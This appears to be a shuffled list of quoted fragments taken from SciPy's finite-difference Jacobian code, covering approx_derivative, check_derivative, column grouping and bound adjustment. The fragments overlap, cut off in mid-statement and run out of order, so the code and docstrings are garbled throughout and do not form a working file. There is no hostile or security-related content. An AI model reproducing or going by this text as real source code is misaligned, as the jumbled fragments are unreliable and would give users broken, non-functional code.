use_one_sided[backward] = True min_dist =", "fraction. We store i, j and # fractions as separate", "function returns an `scipy.sparse.linalg.LinearOperator`. Otherwise it returns a dense array", "bounds] if lb.ndim == 0: lb = np.resize(lb, x0.shape) if", "+ 4 * f1[rows] - f2[rows] rows = i[~mask] df[rows]", "csr_matrix(J_to_test) abs_err = J_to_test - J_diff i, j, abs_err_data =", "[1]_. Two columns are in the same group if in", "'1-sided' applies to forward and backward schemes, '2-sided' applies to", "matrices\", Journal of the Institute of Mathematics and its Applications,", "structure, and groups are computed inside the function. A tuple", "the user function is real-valued and can be analytically continued", "tuple is interpreted as (structure, groups). If None (default), a", "ValueError(\"`x0` violates bound constraints.\") if as_linear_operator: if rel_step is None:", "\"cs\": EPS**0.5} def _compute_absolute_step(rel_step, x0, method): if rel_step is None:", "et. al. \"Numerical Recipes. The Art of Scientific Computing. 3rd", "* max(1, abs(x0))``, possibly adjusted to fit into the bounds.", "equal to ``fun(x0)``, in this case the ``fun(x0)`` is not", "this case the ``fun(x0)`` is not called. Default is None.", "= np.empty((n, m)) h_vecs = np.diag(h) for i in range(h.size):", "that we need to evaluate f(x0 + 2 * h)", "n = x0.size row_indices = [] col_indices = [] fractions", "= np.ones_like(h, dtype=bool) elif scheme == '2-sided': h = np.abs(h)", "sec. 5.7. .. [2] <NAME>, <NAME>, and <NAME>, \"On the", "if x0.ndim > 1: raise ValueError(\"`x0` must have at most", "and # fractions as separate arrays and later construct coo_matrix.", "coo_matrix, find from ._group_columns import group_dense, group_sparse EPS = np.finfo(np.float64).eps", "lb upper_dist = ub - x0 if scheme == '1-sided':", "args=(), kwargs={}): \"\"\"Compute finite difference approximation of the derivatives of", "obtain it. A single array or a sparse matrix is", "Recompute dx as exactly representable number. df = fun(x) -", "x0, f0, h, use_one_sided, method): m = f0.size n =", "------- groups : ndarray of int, shape (n,) Contains values", "converted to 1-D array. bounds : 2-tuple of array_like, optional", "can be used to limit the region of function evaluation.", "= h / norm(p) x = x0 + dx*p*1.j f1", "in each row at least one of them has zero.", "construct coo_matrix. row_indices.append(i) col_indices.append(j) fractions.append(df[i] / dx[j]) row_indices = np.hstack(row_indices)", "If `accuracy` is on the order of 1e-6 or lower,", "= np.max(groups) + 1 for group in range(n_groups): # Perturb", "backward difference near the boundary. - 'cs' - use a", "called the Jacobian, where an element (i, j) is a", "matrix for sparse finite differencing [1]_. Two columns are in", "Scientific Computing. 3rd edition\", sec. 5.7. .. [2] <NAME>, <NAME>,", "= A[:, order] if issparse(A): groups = group_sparse(m, n, A.indices,", "row, then it's possible to estimate its several columns by", "returns a dense array or sparse matrix depending on how", "h, use_one_sided, structure, groups, method) def _linear_operator_difference(fun, x0, f0, h,", ">>> >>> def f(x, c1, c2): ... return np.array([x[0] *", "how `sparsity` is defined. If `sparsity` is None then a", "Number of `h` steps in one direction required to implement", "<NAME>, \"Generation of Finite Difference Formulas on Arbitrarily Spaced Grids\",", "... x[0] * np.cos(c2 * x[1])]) ... >>> x0 =", "== np.inf)): return h, use_one_sided h_total = h * num_steps", "same group simultaneously. e = np.equal(group, groups) h_vec = h", "i[mask] df[rows] = -3 * f0[rows] + 4 * f1[rows]", "h_total violated = (x < lb) | (x > ub)", "lower_dist[backward] / num_steps) use_one_sided[backward] = True min_dist = np.minimum(upper_dist, lower_dist)", "Jacobian matrices\", Journal of the Institute of Mathematics and its", "its Applications, 13 (1974), pp. 117-120. \"\"\" if issparse(A): A", "elements in selected columns of Jacobian. i, j, _ =", "(upper_dist >= h_total) forward = (upper_dist >= lower_dist) & ~central", "the Jacobian, where an element (i, j) is a partial", "in bounds] if lb.ndim == 0: lb = np.resize(lb, x0.shape)", "ValueError(\"Never be here.\") # All that's left is to compute", "case of gradient computation (m=1) in a conventional way. b)", "ndarrays, if m=1 it is returned as a 1-D gradient", "[3] <NAME>, \"Generation of Finite Difference Formulas on Arbitrarily Spaced", "structure, groups, method): m = f0.size n = x0.size row_indices", "> ub) fitting = np.abs(h_total) <= np.maximum(lower_dist, upper_dist) h_adjusted[violated &", "h) or f(x0 - 2 * h) scheme : {'1-sided',", "For sparse matrices and linear operators it is always returned", "= x2[i] - x0[i] f1 = fun(x1) f2 = fun(x2)", "x[0] * np.cos(c2 * x[1])]) ... >>> def jac(x, c1,", "Lower and upper bounds on independent variables. Defaults to no", "f0, h, use_one_sided, structure, groups, method): m = f0.size n", "= np.resize(lb, x0.shape) if ub.ndim == 0: ub = np.resize(ub,", "= rel_step * sign(x0) * max(1, abs(x0))``, possibly adjusted to", "x[0] * np.sin(c2 * x[1])] ... ]) ... >>> >>>", "h_total) forward = (upper_dist >= lower_dist) & ~central h_adjusted[forward] =", "will be converted to a 1-D array. method : {'3-point',", "scalar, in the latter case the bound will be the", "x0.copy() mask_1 = use_one_sided & e x1[mask_1] += h_vec[mask_1] x2[mask_1]", "float64 numbers, s=2 for '2-point' method and s=3 for '3-point'", "| (x0 > ub)): raise ValueError(\"`x0` violates bound constraints.\") if", "= csc_matrix(A) else: A = np.atleast_2d(A) A = (A !=", "``fun(x0)``, in this case the ``fun(x0)`` is not called. Default", "def group_columns(A, order=0): \"\"\"Group columns of a 2-D matrix for", "**kwargs)`` and the same for `jac`. Returns ------- accuracy :", ">>> x0 = np.array([1.0, 0.5 * np.pi]) >>> check_derivative(f, jac,", "\" \"`as_linear_operator` is True.\") def fun_wrapped(x): f = np.atleast_1d(fun(x, *args,", "and the second order accuracy forward or backward difference near", "'2-sided': h = np.abs(h) use_one_sided = np.zeros_like(h, dtype=bool) else: raise", "/ dx elif method == '3-point': def matvec(p): if np.array_equal(p,", "shape (n,). A column grouping for a given sparsity structure,", "== -np.inf) & (ub == np.inf)): return h, use_one_sided h_total", "correctness of a function computing derivatives (Jacobian or gradient) by", "derivative of f[i] with respect to x[j]. Parameters ---------- fun", "fit into the bounds. For ``method='3-point'`` the sign of `h`", "or a scalar. x0 : array_like of shape (n,) or", "shapes between bounds and `x0`.\") if as_linear_operator and not (np.all(np.isinf(lb))", "finite difference scheme for '3-point' method is selected automatically. The", "finite difference scheme. For example, 2 means that we need", "is real-valued and can be analytically continued to the complex", "i] else: raise RuntimeError(\"Never be here.\") J_transposed[i] = df /", "1, '1-sided', lb, ub) elif method == '3-point': h, use_one_sided", "*args, **kwargs) if issparse(J_to_test): J_diff = approx_derivative(fun, x0, bounds=bounds, sparsity=J_to_test,", "method) else: if not issparse(sparsity) and len(sparsity) == 2: structure,", "and groups are computed inside the function. A tuple is", "to `fun` and `jac`. Both empty by default. The calling", "group to which ith column assigned. The procedure was helpful", "here.\") J_transposed[i] = df / dx if m == 1:", "return np.zeros(m) dx = 2*h / norm(p) x1 = x0", "1). Our motivation is the following: a) It handles a", "fractions as separate arrays and later construct coo_matrix. row_indices.append(i) col_indices.append(j)", "of the Jacobian matrix. If the Jacobian matrix is known", "construct groups. Parameters ---------- A : array_like or sparse matrix,", "= group_dense(m, n, A) groups[order] = groups.copy() return groups def", "several columns by a single function evaluation [3]_. To perform", "Our motivation is the following: a) It handles a case", "method and s=3 for '3-point' method. Such relative step approximately", "estimate derivative. h : ndarray, shape (n,) Desired finite difference", "``h = rel_step * sign(x0) * max(1, abs(x0))``, possibly adjusted", ": array_like or sparse matrix, shape (m, n) Matrix of", "your `jac` implementation is correct. See Also -------- approx_derivative :", "columns. order : int, iterable of int with shape (n,)", ">= h_total) forward = (upper_dist >= lower_dist) & ~central h_adjusted[forward]", "the latter case the bound will be the same for", "R^m, its derivatives form m-by-n matrix called the Jacobian, where", "matrix. If the Jacobian matrix is known to have only", "lb, ub = _prepare_bounds(bounds, x0) if lb.shape != x0.shape or", "function evaluation. Bounds checking is not implemented when `as_linear_operator` is", "used. Note, that sparse differencing makes sense only for large", "size to use. The absolute step size is computed as", "/ norm(p) x = x0 + dx*p*1.j f1 = fun(x)", "value must be array_like or sparse matrix with an appropriate", "store i, j and # fractions as separate arrays and", "dense differencing when m=1 Jacobian is returned with a shape", "dense array or sparse matrix depending on how `sparsity` is", "h[backward], 0.5 * lower_dist[backward] / num_steps) use_one_sided[backward] = True min_dist", "J_to_test = jac(x0, *args, **kwargs) if issparse(J_to_test): J_diff = approx_derivative(fun,", "groups = sparsity else: structure = sparsity groups = group_columns(sparsity)", "n=1 Jacobian is returned with a shape (m, 1). Our", "dx = h_vecs[i, i] else: raise RuntimeError(\"Never be here.\") J_transposed[i]", "from ..sparse import issparse, csc_matrix, csr_matrix, coo_matrix, find from ._group_columns", ">>> approx_derivative(g, x0, bounds=(1.0, np.inf)) array([ 2.]) \"\"\" if method", "return value must be array_like or sparse matrix with an", "derivatives of a vector-valued function. If a function maps from", "i in range(h.size): if method == '2-point': x = x0", "np.empty((n, m)) h_vecs = np.diag(h) for i in range(h.size): if", "of gradient computation (m=1) in a conventional way. b) It", ">>> def jac(x, c1, c2): ... return np.array([ ... [np.sin(c1", "for large Jacobian matrices where each row contains few non-zero", "df = fun(x) - f0 # The result is written", "structure, use `group_columns` to obtain it. A single array or", "x2[mask_2] += h_vec[mask_2] dx = np.zeros(n) dx[mask_1] = x2[mask_1] -", "J_transposed = np.empty((n, m)) h_vecs = np.diag(h) for i in", "separate arrays and later construct coo_matrix. row_indices.append(i) col_indices.append(j) fractions.append(df[i] /", "= np.asarray(order) if order.shape != (n,): raise ValueError(\"`order` has incorrect", "J_to_test - J_diff i, j, abs_err_data = find(abs_err) J_diff_data =", "method == '2-point': x = x0 + h_vec dx =", "array_like of shape (n,). A column grouping for a given", "+= h_vec[mask_1] x2[mask_1] += 2 * h_vec[mask_1] mask_2 = ~use_one_sided", "an index of a group to which ith column assigned.", "array_like, optional If not None it is assumed to be", "x2[mask_1] - x0[mask_1] dx[mask_2] = x2[mask_2] - x1[mask_2] f1 =", "1: J_transposed = np.ravel(J_transposed) return J_transposed.T def _sparse_difference(fun, x0, f0,", "'2-sided', lb, ub) elif method == 'cs': use_one_sided = False", "method): m = f0.size n = x0.size row_indices = []", "a function computing derivatives. Notes ----- If `rel_step` is not", "function evaluation. In the example below we compute left and", "df / dx if m == 1: J_transposed = np.ravel(J_transposed)", "where n_groups is the number of found groups. Each value", "be equal to ``fun(x0)``, in this case the ``fun(x0)`` is", "np.hstack(row_indices) col_indices = np.hstack(col_indices) fractions = np.hstack(fractions) J = coo_matrix((fractions,", "near the boundary. Both schemes have the second-order accuracy in", "df / dx elif method == 'cs': def matvec(p): if", "h[forward], 0.5 * upper_dist[forward] / num_steps) use_one_sided[forward] = True backward", "(upper_dist < lower_dist) & ~fitting h_adjusted[backward] = -lower_dist[backward] / num_steps", "optional Finite difference method to use: - '2-point' - use", "lb) | (x0 > ub)): raise ValueError(\"`x0` violates bound constraints.\")", "is None. bounds : tuple of array_like, optional Lower and", "= approx_derivative(fun, x0, bounds=bounds, args=args, kwargs=kwargs) abs_err = np.abs(J_to_test -", "None: rel_step = relative_step[method] return _linear_operator_difference(fun_wrapped, x0, f0, rel_step, method)", ">= 1 else x ... >>> x0 = 1.0 >>>", "Examples -------- >>> import numpy as np >>> from scipy.optimize", "or be a scalar, in the latter case the bound", "structure = np.atleast_2d(structure) groups = np.atleast_1d(groups) return _sparse_difference(fun_wrapped, x0, f0,", "here.\") return LinearOperator((m, n), matvec) def _dense_difference(fun, x0, f0, h,", "[1]_. A finite difference scheme for '3-point' method is selected", "lb : ndarray, shape (n,) Lower bounds on independent variables.", "dimension.\") if np.any((x0 < lb) | (x0 > ub)): raise", "np from numpy.linalg import norm from scipy.sparse.linalg import LinearOperator from", "== '3-point' and not use_one_sided[i]: x1 = x0 - h_vecs[i]", "Whether steps in one or both directions are required. In", "of function evaluation. Bounds checking is not implemented when `as_linear_operator`", "f0, h, use_one_sided, method): m = f0.size n = x0.size", "[1] <NAME>, <NAME>, and <NAME>, \"On the estimation of sparse", "scheme to the presence of bounds. Parameters ---------- x0 :", "of 3-point forward and backward difference schemes. For dense differencing", "on independent variables. ub : ndarray, shape (n,) Upper bounds", "3-point forward or backward scheme is used for points near", "- use a complex-step finite difference scheme. This assumes that", "= np.atleast_2d(structure) groups = np.atleast_1d(groups) return _sparse_difference(fun_wrapped, x0, f0, h,", "rel_step = relative_step[method] sign_x0 = (x0 >= 0).astype(float) * 2", "of `x0` or be a scalar, in the latter case", "_adjust_scheme_to_bounds(x0, h, num_steps, scheme, lb, ub): \"\"\"Adjust final difference scheme", "elif method == '3-point': h, use_one_sided = _adjust_scheme_to_bounds( x0, h,", "return _dense_difference(fun_wrapped, x0, f0, h, use_one_sided, method) else: if not", "method): m = f0.size n = x0.size J_transposed = np.empty((n,", "f1.imag dx = h_vecs[i, i] else: raise RuntimeError(\"Never be here.\")", "np.hstack(fractions) J = coo_matrix((fractions, (row_indices, col_indices)), shape=(m, n)) return csr_matrix(J)", "elements with absolute values less or equal than 1. If", "backward difference. - '3-point' - use central difference in interior", "\"Numerical Recipes. The Art of Scientific Computing. 3rd edition\", sec.", "J_transposed = np.ravel(J_transposed) return J_transposed.T def _sparse_difference(fun, x0, f0, h,", "== 0: ub = np.resize(ub, x0.shape) return lb, ub def", "h_total) & (upper_dist >= h_total) forward = (upper_dist >= lower_dist)", "-= h_vec[mask_2] x2[mask_2] += h_vec[mask_2] dx = np.zeros(n) dx[mask_1] =", "> ub)): raise ValueError(\"`x0` violates bound constraints.\") if as_linear_operator: if", "A = (A != 0).astype(np.int32) if A.ndim != 2: raise", "ndarray of shape (n,) (never a scalar even if n=1).", "For dense differencing when m=1 Jacobian is returned with a", "bound must match the size of `x0` or be a", "num_steps) use_one_sided[backward] = True min_dist = np.minimum(upper_dist, lower_dist) / num_steps", "'3-point' method is selected automatically. The well-known central difference scheme", "Art of Scientific Computing. 3rd edition\", sec. 5.7. .. [2]", "not called. Default is None. bounds : tuple of array_like,", "callable Function which computes Jacobian matrix of `fun`. It must", "computed as ``h = rel_step * sign(x0) * max(1, abs(x0))``,", "A = csc_matrix(A) else: A = np.atleast_2d(A) A = (A", "applies to center schemes. lb : ndarray, shape (n,) Lower", "cases np.atleast_2d can be called to get 2-D Jacobian with", "returns a csr_matrix with shape (m, n). For sparse matrices", "Also -------- approx_derivative : Compute finite difference approximation of derivative.", "= np.array([1.0, 0.5 * np.pi]) >>> approx_derivative(f, x0, args=(1, 2))", "f2 - f1 return df / dx elif method ==", "switching to one-sided scheme doesn't allow to take a full", "structure : array_like or sparse matrix of shape (m, n).", "_dense_difference(fun_wrapped, x0, f0, h, use_one_sided, method) else: if not issparse(sparsity)", "elif method == 'cs': use_one_sided = False if sparsity is", "= np.atleast_1d(groups) return _sparse_difference(fun_wrapped, x0, f0, h, use_one_sided, structure, groups,", "return df / dx elif method == '3-point': def matvec(p):", "rel_step * sign_x0 * np.maximum(1.0, np.abs(x0)) def _prepare_bounds(bounds, x0): lb,", "of sparse Jacobian matrices\", Journal of the Institute of Mathematics", "that a corresponding element of the Jacobian identically equals to", "fun(x) - f0 elif method == '3-point' and use_one_sided[i]: x1", "... >>> >>> x0 = np.array([1.0, 0.5 * np.pi]) >>>", "J_transposed.T def _sparse_difference(fun, x0, f0, h, use_one_sided, structure, groups, method):", "cols[j] elif method == '3-point': # Here we do conceptually", "tuple and dict, optional Additional arguments passed to `fun` and", "[2]_ for the formulas of 3-point forward and backward difference", "else: structure = np.atleast_2d(structure) groups = np.atleast_1d(groups) return _sparse_difference(fun_wrapped, x0,", "- x0[i] f1 = fun(x1) f2 = fun(x2) df =", "& ~fitting h_adjusted[forward] = upper_dist[forward] / num_steps backward = (upper_dist", "is machine epsilon for float64 numbers, s=2 for '2-point' method", "& ~fitting h_adjusted[backward] = -lower_dist[backward] / num_steps elif scheme ==", "- 'cs' - use a complex-step finite difference scheme. This", "2-D structure, for ndarrays, if m=1 it is returned as", "if method == '2-point': h, use_one_sided = _adjust_scheme_to_bounds( x0, h,", ": int, iterable of int with shape (n,) or None", "jac : callable Function which computes Jacobian matrix of `fun`.", "sparsity=J_to_test, args=args, kwargs=kwargs) J_to_test = csr_matrix(J_to_test) abs_err = J_to_test -", "~central h_adjusted[forward] = np.minimum( h[forward], 0.5 * upper_dist[forward] / num_steps)", "backward difference schemes. For dense differencing when m=1 Jacobian is", "to limit the range of function evaluation. args, kwargs :", "matrix of `fun`. It must work with argument x the", "from 0 to n_groups-1, where n_groups is the number of", "approx_derivative(g, x0, bounds=(1.0, np.inf)) array([ 2.]) \"\"\" if method not", "a LinearOperator with shape (m, n). Otherwise it returns a", ": tuple and dict, optional Additional arguments passed to `fun`", "approx_derivative(fun, x0, bounds=bounds, sparsity=J_to_test, args=args, kwargs=kwargs) J_to_test = csr_matrix(J_to_test) abs_err", "= groups.copy() return groups def approx_derivative(fun, x0, method='3-point', rel_step=None, f0=None,", "0: ub = np.resize(ub, x0.shape) return lb, ub def group_columns(A,", "(m, 1). Our motivation is the following: a) It handles", ": Compute finite difference approximation of derivative. Examples -------- >>>", "= np.hstack(row_indices) col_indices = np.hstack(col_indices) fractions = np.hstack(fractions) J =", "2 * h) scheme : {'1-sided', '2-sided'} Whether steps in", "lb = np.resize(lb, x0.shape) if ub.ndim == 0: ub =", "mask = use_one_sided[j] df = np.empty(m) rows = i[mask] df[rows]", "example below we compute left and right derivative at point", "is used for points near the boundary. Both schemes have", "dx[mask_1] = x2[mask_1] - x0[mask_1] dx[mask_2] = x2[mask_2] - x1[mask_2]", "f0 # The result is written to columns which correspond", "4 * f1 - f2 elif method == '3-point' and", "-np.minimum( h[backward], 0.5 * lower_dist[backward] / num_steps) use_one_sided[backward] = True", "x passed to this function is ndarray of shape (n,)", "results. rel_step : None or array_like, optional Relative step size", "H. Press et. al. \"Numerical Recipes. The Art of Scientific", "if method == '2-point': x = x0 + h_vec dx", "= jac(x0, *args, **kwargs) if issparse(J_to_test): J_diff = approx_derivative(fun, x0,", "difference steps. num_steps : int Number of `h` steps in", "5.7. .. [2] <NAME>, <NAME>, and <NAME>, \"On the estimation", "'cs'}, optional Finite difference method to use: - '2-point' -", "1 and absolute errors for elements with absolute values less", "is True. sparsity : {None, array_like, sparse matrix, 2-tuple}, optional", "n). For sparse matrices and linear operators it is always", "ub = np.resize(ub, x0.shape) return lb, ub def group_columns(A, order=0):", "possible to estimate its several columns by a single function", "the function. A tuple is interpreted as (structure, groups). If", "(n,). See Also -------- check_derivative : Check correctness of a", "= np.atleast_1d(x0) if x0.ndim > 1: raise ValueError(\"`x0` must have", "`group_columns` to obtain it. A single array or a sparse", "when m=1 Jacobian is returned with a shape (n,), on", "= find(structure[:, cols]) j = cols[j] mask = use_one_sided[j] df", "independent variables. Returns ------- h_adjusted : ndarray, shape (n,) Adjusted", "and use_one_sided[i]: x1 = x0 + h_vecs[i] x2 = x0", "to columns which correspond to perturbed # variables. cols, =", "------- accuracy : float The maximum among all relative errors", "ValueError(\"`scheme` must be '1-sided' or '2-sided'.\") if np.all((lb == -np.inf)", "elif method == 'cs': def matvec(p): if np.array_equal(p, np.zeros_like(p)): return", "array_like of shape (m,) or a scalar. x0 : array_like", "= np.atleast_2d(A) A = (A != 0).astype(np.int32) if A.ndim !=", "guarantee repeatability. Returns ------- groups : ndarray of int, shape", "be 2-dimensional.\") m, n = A.shape if order is None", "(structure, groups). If None (default), a standard dense differencing will", "+ (dx/2)*p f1 = fun(x1) f2 = fun(x2) df =", "given sparsity structure, use `group_columns` to obtain it. A single", "compute the fraction. We store i, j and # fractions", "col_indices = [] fractions = [] n_groups = np.max(groups) +", "`sparsity`. The linear operator provides an efficient way of computing", "size is computed as ``h = rel_step * sign(x0) *", "x1[mask_1] += h_vec[mask_1] x2[mask_1] += 2 * h_vec[mask_1] mask_2 =", "`accuracy` is on the order of 1e-6 or lower, then", "= J_to_test - J_diff i, j, abs_err_data = find(abs_err) J_diff_data", "= np.nonzero(e) i, j, _ = find(structure[:, cols]) j =", "such economic computations two ingredients are required: * structure :", "rel_step=None, f0=None, bounds=(-np.inf, np.inf), sparsity=None, as_linear_operator=False, args=(), kwargs={}): \"\"\"Compute finite", "errors, see [1]_. A finite difference scheme for '3-point' method", ": None or array_like, optional If not None it is", "to no bounds. Each bound must match the size of", "If None (default), a standard dense differencing will be used.", "None: f0 = fun_wrapped(x0) else: f0 = np.atleast_1d(f0) if f0.ndim", "issparse(sparsity) and len(sparsity) == 2: structure, groups = sparsity else:", "Jacobian with correct dimensions. References ---------- .. [1] W. H.", "operators it is always returned as a 2-D structure, for", "to evaluate f(x0 + 2 * h) or f(x0 -", "(1974), pp. 117-120. \"\"\" if issparse(A): A = csc_matrix(A) else:", "case the ``fun(x0)`` is not called. Default is None. bounds", "lower_dist) & ~fitting h_adjusted[forward] = upper_dist[forward] / num_steps backward =", "a corresponding element of the Jacobian identically equals to zero.", "np.array([ ... [np.sin(c1 * x[1]), c1 * x[0] * np.cos(c1", "1-D array. method : {'3-point', '2-point', 'cs'}, optional Finite difference", "groups = group_columns(sparsity) if issparse(structure): structure = csc_matrix(structure) else: structure", "len(sparsity) == 2: structure, groups = sparsity else: structure =", "errors for elements with absolute values less or equal than", "2 * h_vecs[i] dx = x2[i] - x0[i] f1 =", "= np.empty(m) rows = i[mask] df[rows] = -3 * f0[rows]", "columns of Jacobian. i, j, _ = find(structure[:, cols]) #", "If a function maps from R^n to R^m, its derivatives", "(lower_dist >= h_total) & (upper_dist >= h_total) forward = (upper_dist", "x = x0 + dx*p df = fun(x) - f0", "matrices and linear operators it is always returned as a", "+ dx*p df = fun(x) - f0 return df /", "def matvec(p): if np.array_equal(p, np.zeros_like(p)): return np.zeros(m) dx = 2*h", "as a 2-D structure, for ndarrays, if m=1 it is", "= x0 + (dx/2)*p f1 = fun(x1) f2 = fun(x2)", "scipy.sparse.linalg import LinearOperator from ..sparse import issparse, csc_matrix, csr_matrix, coo_matrix,", ">>> from scipy.optimize import check_derivative >>> >>> >>> def f(x,", "to estimate the derivatives. The argument x passed to this", "real-valued and can be analytically continued to the complex plane.", "is not implemented when `as_linear_operator` is True. sparsity : {None,", "computing derivatives. Notes ----- If `rel_step` is not provided, it", "Parameters ---------- x0 : ndarray, shape (n,) Point at which", "- f1 return df / dx elif method == 'cs':", "= csr_matrix(J_to_test) abs_err = J_to_test - J_diff i, j, abs_err_data", "matrix depending on `sparsity`. The linear operator provides an efficient", "(np.all(np.isinf(lb)) and np.all(np.isinf(ub))): raise ValueError(\"Bounds not supported when \" \"`as_linear_operator`", "(upper_dist >= lower_dist) & ~central h_adjusted[forward] = np.minimum( h[forward], 0.5", "----- If `rel_step` is not provided, it assigned to ``EPS**(1/s)``,", "h_vec[mask_2] dx = np.zeros(n) dx[mask_1] = x2[mask_1] - x0[mask_1] dx[mask_2]", "dx = x2[i] - x0[i] f1 = fun(x1) f2 =", "+ h_vecs[i] dx = x[i] - x0[i] # Recompute dx", "scheme for '3-point' method is selected automatically. The well-known central", "elif method == 'cs': f1 = fun(x0 + h_vec*1.j) df", "steps in one direction required to implement finite difference scheme.", "\"\"\"Group columns of a 2-D matrix for sparse finite differencing", "The return value must be array_like or sparse matrix with", "This assumes that the user function is real-valued and can", "has incorrect shape.\") A = A[:, order] if issparse(A): groups", "A zero element means that a corresponding element of the", "In other words '1-sided' applies to forward and backward schemes,", "f1 return df / dx elif method == 'cs': def", "'1-sided', lb, ub) elif method == '3-point': h, use_one_sided =", "= np.finfo(np.float64).eps def _adjust_scheme_to_bounds(x0, h, num_steps, scheme, lb, ub): \"\"\"Adjust", "b) In all cases np.atleast_2d can be called to get", "* x[1])]) ... >>> def jac(x, c1, c2): ... return", "signature is ``fun(x, *args, **kwargs)`` and the same for `jac`.", "value ``groups[i]`` is an index of a group to which", "violated = (x < lb) | (x > ub) fitting", "likely that your `jac` implementation is correct. See Also --------", "0.5 * np.pi]) >>> approx_derivative(f, x0, args=(1, 2)) array([[ 1.,", "j and # fractions as separate arrays and later construct", "range of function evaluation. Bounds checking is not implemented when", "to one-sided scheme. Informative only for ``scheme='2-sided'``. \"\"\" if scheme", "np.inf)): return h, use_one_sided h_total = h * num_steps h_adjusted", "Use it to limit the range of function evaluation. args,", "for sparse finite differencing [1]_. Two columns are in the", "ValueError(\"`x0` must have at most 1 dimension.\") lb, ub =", "+ h_total violated = (x < lb) | (x >", "x[0] * np.cos(c1 * x[1])], ... [np.cos(c2 * x[1]), -c2", ">>> x0 = np.array([1.0, 0.5 * np.pi]) >>> approx_derivative(f, x0,", "``scheme='2-sided'``. \"\"\" if scheme == '1-sided': use_one_sided = np.ones_like(h, dtype=bool)", ": {ndarray, sparse matrix, LinearOperator} Finite difference approximation of the", "_linear_operator_difference(fun, x0, f0, h, method): m = f0.size n =", "x0, bounds=bounds, args=args, kwargs=kwargs) abs_err = np.abs(J_to_test - J_diff) return", "at least one of them has zero. A greedy sequential", "51, 1988. Examples -------- >>> import numpy as np >>>", "method == '3-point': h, use_one_sided = _adjust_scheme_to_bounds( x0, h, 1,", "use_one_sided, method): m = f0.size n = x0.size J_transposed =", "h_vecs = np.diag(h) for i in range(h.size): if method ==", "are computed inside the function. A tuple is interpreted as", "a single function evaluation [3]_. To perform such economic computations", "other words '1-sided' applies to forward and backward schemes, '2-sided'", "Lower bounds on independent variables. ub : ndarray, shape (n,)", "- h_vecs[i] x2 = x0 + h_vecs[i] dx = x2[i]", "if a sign flip or switching to one-sided scheme doesn't", "A tuple is interpreted as (structure, groups). If None (default),", "find from ._group_columns import group_dense, group_sparse EPS = np.finfo(np.float64).eps def", "The calling signature is ``fun(x, *args, **kwargs)`` and the same", "J_to_test = csr_matrix(J_to_test) abs_err = J_to_test - J_diff i, j,", "or float Point at which to estimate the derivatives. Float", "[np.sin(c1 * x[1]), c1 * x[0] * np.cos(c1 * x[1])],", "and linear operators it is always returned as a 2-D", "to a 1-D array. method : {'3-point', '2-point', 'cs'}, optional", "decreases only if a sign flip or switching to one-sided", "to one-sided scheme doesn't allow to take a full step.", "= np.array([1.0, 0.5 * np.pi]) >>> check_derivative(f, jac, x0, args=(1,", "Here we do conceptually the same but separate one-sided #", "we do conceptually the same but separate one-sided # and", "def _sparse_difference(fun, x0, f0, h, use_one_sided, structure, groups, method): m", "following: a) It handles a case of gradient computation (m=1)", "Point at which to estimate the derivatives. Float will be", "norm(p) x = x0 + dx*p df = fun(x) -", "scheme == '2-sided': h = np.abs(h) use_one_sided = np.zeros_like(h, dtype=bool)", "shape (m, n). A zero element means that a corresponding", "sparsity else: structure = sparsity groups = group_columns(sparsity) if issparse(structure):", "x0 - (dx/2)*p x2 = x0 + (dx/2)*p f1 =", "bounds=(-np.inf, np.inf), args=(), kwargs={}): \"\"\"Check correctness of a function computing", "x1[mask_2] f1 = fun(x1) f2 = fun(x2) cols, = np.nonzero(e)", "presence of bounds. Parameters ---------- x0 : ndarray, shape (n,)", "x2[mask_1] += 2 * h_vec[mask_1] mask_2 = ~use_one_sided & e", "dx else: raise RuntimeError(\"Never be here.\") return LinearOperator((m, n), matvec)", "* h_vecs[i] dx = x2[i] - x0[i] f1 = fun(x1)", "n=1). It must return 1-D array_like of shape (m,) or", "f if f0 is None: f0 = fun_wrapped(x0) else: f0", "the complex plane. Otherwise, produces bogus results. rel_step : None", "= fun(x1) f2 = fun(x2) cols, = np.nonzero(e) i, j,", "[np.asarray(b, dtype=float) for b in bounds] if lb.ndim == 0:", "Float will be converted to a 1-D array. method :", "`jac`. Both empty by default. The calling signature is ``fun(x,", "<NAME>, and <NAME>, \"On the estimation of sparse Jacobian matrices\",", "is returned as a 1-D gradient array with shape (n,).", "np >>> from scipy.optimize import check_derivative >>> >>> >>> def", "sparse differencing makes sense only for large Jacobian matrices where", "= ~use_one_sided & e x1[mask_2] -= h_vec[mask_2] x2[mask_2] += h_vec[mask_2]", "of shape (n,), but does not allow direct access to", "fun_wrapped(x0) else: f0 = np.atleast_1d(f0) if f0.ndim > 1: raise", "= fun(x) - f0 return df / dx elif method", "return x**2 if x >= 1 else x ... >>>", "If not None it is assumed to be equal to", "result is written to columns which correspond to perturbed #", "- f2[rows] rows = i[~mask] df[rows] = f2[rows] - f1[rows]", "EPS**0.5, \"3-point\": EPS**(1/3), \"cs\": EPS**0.5} def _compute_absolute_step(rel_step, x0, method): if", "used to limit the region of function evaluation. In the", ": Check correctness of a function computing derivatives. Notes -----", "or sparse matrix depending on how `sparsity` is defined. If", "h_vec*1.j) df = f1.imag dx = h_vec cols, = np.nonzero(e)", "f0[rows] + 4 * f1[rows] - f2[rows] rows = i[~mask]", "ith column assigned. The procedure was helpful only if n_groups", "work with argument x the same way as `fun`. The", "derivatives (Jacobian or gradient) by comparison with a finite difference", "differencing will be used. Note, that sparse differencing makes sense", "columns are in the same group if in each row", "method == '2-point': x = x0 + h_vecs[i] dx =", "correct dimensions. References ---------- .. [1] W. H. Press et.", "== 1: J_transposed = np.ravel(J_transposed) return J_transposed.T def _sparse_difference(fun, x0,", "2 * h) or f(x0 - 2 * h) scheme", "- x0 if scheme == '1-sided': x = x0 +", "h_adjusted = h.copy() lower_dist = x0 - lb upper_dist =", "(m,) or a scalar. jac : callable Function which computes", "The Art of Scientific Computing. 3rd edition\", sec. 5.7. ..", "shape (n,) Lower bounds on independent variables. ub : ndarray,", "ValueError(\"Unknown method '%s'. \" % method) x0 = np.atleast_1d(x0) if", "contains few non-zero elements. as_linear_operator : bool, optional When True", "bounds and `x0`.\") if as_linear_operator and not (np.all(np.isinf(lb)) and np.all(np.isinf(ub))):", "on the order of 1e-6 or lower, then it is", "* x[0] * np.sin(c2 * x[1])] ... ]) ... >>>", "elif method == '3-point' and use_one_sided[i]: x1 = x0 +", "the boundary. Both schemes have the second-order accuracy in terms", "it. A single array or a sparse matrix is interpreted", "x = x0 + h_total violated = (x < lb)", "x1 = x0 + h_vecs[i] x2 = x0 + 2", "h : ndarray, shape (n,) Desired finite difference steps. num_steps", "h = 